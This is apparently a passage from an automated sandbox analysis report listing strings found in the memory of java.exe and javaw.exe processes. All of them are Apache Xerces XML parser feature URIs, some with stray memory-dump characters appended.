Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodesK/
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace/
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/g3
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations9
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsS_
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsmen9
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations;
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsmpl
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/include-comments
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/include-comments3K
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings;
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesO
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatespacheO
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only/
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growthS2
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1856312997.0000000002823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd:
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdch:
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs7
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsnterna7
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs/3
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs3
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformantom2
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotations;
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotationsTextI;
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotationsk
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: java.exe, 00000004.00000002.2957859802.0000000015182000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807982473.000000001517B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesl
Source: javaw.exe, 00000001.00000002.2961037370.0000000014CA0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799970452.0000000014CE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesre1
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treess
Source: javaw.exe, 00000001.00000002.2961037370.0000000014CA0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799970452.0000000014CE6000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015182000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807982473.000000001517B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/sun/F
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checkingF
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checking
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkinges
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking=
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingin=
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psviint
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultC$
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl/A
